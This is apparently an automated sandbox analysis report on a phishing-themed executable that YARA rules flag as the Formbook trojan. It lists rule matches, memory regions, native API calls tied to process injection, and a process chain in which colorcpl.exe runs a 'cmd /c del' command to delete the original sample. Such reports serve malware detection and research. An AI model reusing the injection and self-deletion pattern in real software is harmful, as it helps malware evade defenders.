      Source: 00000005.00000002.16256466940.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000002.00000002.11592927755.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000002.11592927755.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.11592927755.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: RFQINL0607_Commerical_list.exe PID: 4284, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: colorcpl.exe PID: 5004, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: RFQINL0607_Commerical_list.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000002.00000002.11593239908.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000002.11593239908.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.11593239908.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000005.00000002.16257135641.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.16257135641.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.16257135641.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000005.00000002.16256466940.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.16256466940.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.16256466940.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000002.00000002.11592927755.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000002.11592927755.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.11592927755.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: RFQINL0607_Commerical_list.exe PID: 4284, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: colorcpl.exe PID: 5004, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040310F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_004048C50_2_004048C5
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_004064CB0_2_004064CB
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_00406CA20_2_00406CA2
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336E3102_2_3336E310
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341F3302_2_3341F330
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333513802_2_33351380
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341124C2_2_3341124C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334D2EC2_2_3334D2EC
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FD1302_2_333FD130
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F1132_2_3334F113
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333A717A2_2_333A717A
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3342010E2_2_3342010E
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337B1E02_2_3337B1E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333651C02_2_333651C0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3340E0762_2_3340E076
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333500A02_2_333500A0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_334170F12_2_334170F1
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3339508C2_2_3339508C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336B0D02_2_3336B0D0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_334167572_2_33416757
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333627602_2_33362760
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336A7602_2_3336A760
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3340D6462_2_3340D646
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FD62C2_2_333FD62C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337C6002_2_3337C600
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333846702_2_33384670
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341A6C02_2_3341A6C0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333606802_2_33360680
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341F6F62_2_3341F6F6
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333D36EC2_2_333D36EC
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335C6E02_2_3335C6E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3342A5262_2_3342A526
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_334175C62_2_334175C6
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341F5C92_2_3341F5C9
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333604452_2_33360445
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3339DB192_2_3339DB19
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33360B102_2_33360B10
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341FB2E2_2_3341FB2E
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333D4BC02_2_333D4BC0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341EA5B2_2_3341EA5B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341CA132_2_3341CA13
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337FAA02_2_3337FAA0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341FA892_2_3341FA89
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335E9A02_2_3335E9A0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341E9A62_2_3341E9A6
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333A59C02_2_333A59C0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338E8102_2_3338E810
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341F8722_2_3341F872
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333638002_2_33363800
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333698702_2_33369870
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337B8702_2_3337B870
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333468682_2_33346868
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_334008352_2_33400835
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333D98B22_2_333D98B2
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_334118DA2_2_334118DA
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_334178F32_2_334178F3
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333768822_2_33376882
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333628C02_2_333628C0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341FF632_2_3341FF63
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336CF002_2_3336CF00
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33411FC62_2_33411FC6
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33366FE02_2_33366FE0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341EFBF2_2_3341EFBF
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33400E6D2_2_33400E6D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33380E502_2_33380E50
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33361EB22_2_33361EB2
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33419ED22_2_33419ED2
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33352EE82_2_33352EE8
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33410EAD2_2_33410EAD
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33417D4C2_2_33417D4C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335AD002_2_3335AD00
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33360D692_2_33360D69
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341FD272_2_3341FD27
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33372DB02_2_33372DB0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: String function: 333DEF10 appears 92 times
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: String function: 3334B910 appears 236 times
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: String function: 333CE692 appears 73 times
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: String function: 33395050 appears 33 times
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: String function: 333A7BE4 appears 80 times
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392B10 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_33392B10
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_33392B90
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392BC0 NtQueryInformationToken,LdrInitializeThunk,2_2_33392BC0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333929F0 NtReadFile,LdrInitializeThunk,2_2_333929F0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392F00 NtCreateFile,LdrInitializeThunk,2_2_33392F00
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392E50 NtCreateSection,LdrInitializeThunk,2_2_33392E50
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392EB0 NtProtectVirtualMemory,LdrInitializeThunk,2_2_33392EB0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392ED0 NtResumeThread,LdrInitializeThunk,2_2_33392ED0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_33392D10
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392DA0 NtReadVirtualMemory,LdrInitializeThunk,2_2_33392DA0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_33392DC0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392C30 NtMapViewOfSection,LdrInitializeThunk,2_2_33392C30
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392C50 NtUnmapViewOfSection,LdrInitializeThunk,2_2_33392C50
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392CF0 NtDelayExecution,LdrInitializeThunk,2_2_33392CF0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33394260 NtSetContextThread,2_2_33394260
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33394570 NtSuspendThread,2_2_33394570
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333934E0 NtCreateMutant,2_2_333934E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392B20 NtQueryInformationProcess,2_2_33392B20
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392B00 NtQueryValueKey,2_2_33392B00
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392B80 NtCreateKey,2_2_33392B80
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392BE0 NtQueryVirtualMemory,2_2_33392BE0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392A10 NtWriteFile,2_2_33392A10
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392AA0 NtQueryInformationFile,2_2_33392AA0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392A80 NtClose,2_2_33392A80
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392AC0 NtEnumerateValueKey,2_2_33392AC0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333929D0 NtWaitForSingleObject,2_2_333929D0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333938D0 NtGetContextThread,2_2_333938D0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392F30 NtOpenDirectoryObject,2_2_33392F30
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392FB0 NtSetValueKey,2_2_33392FB0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392E00 NtQueueApcThread,2_2_33392E00
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392E80 NtCreateProcessEx,2_2_33392E80
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392EC0 NtQuerySection,2_2_33392EC0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392D50 NtWriteVirtualMemory,2_2_33392D50
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000002.11593834689.0000000000113000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs RFQINL0607_Commerical_list.exe
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11505723007.00000000332A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQINL0607_Commerical_list.exe
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11590962385.00000000030B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs RFQINL0607_Commerical_list.exe
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11591199372.0000000033143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs RFQINL0607_Commerical_list.exe
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQINL0607_Commerical_list.exe
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11499237617.00000000330E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQINL0607_Commerical_list.exe
      Source: RFQINL0607_Commerical_list.exe, 00000002.00000002.11643698870.00000000335F0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQINL0607_Commerical_list.exe
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: edgegdi.dllJump to behavior
      Source: RFQINL0607_Commerical_list.exeVirustotal: Detection: 21%
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeFile read: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeJump to behavior
      Source: RFQINL0607_Commerical_list.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeProcess created: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeProcess created: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exeJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe"Jump to behavior
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040310F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoskeJump to behavior
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeFile created: C:\Users\user\AppData\Local\Temp\nsp508B.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@8/9@23/17
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_0040205E LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,0_2_0040205E
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_00404352 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404352
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:304:WilStaging_02
      Source: RFQINL0607_Commerical_list.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: colorcpl.pdbGCTL source: RFQINL0607_Commerical_list.exe, 00000002.00000003.11591199372.0000000033141000.00000004.00000020.00020000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11593834689.0000000000110000.00000040.10000000.00040000.00000000.sdmp, RFQINL0607_Commerical_list.exe, 00000002.00000002.11620803992.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.16259139024.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
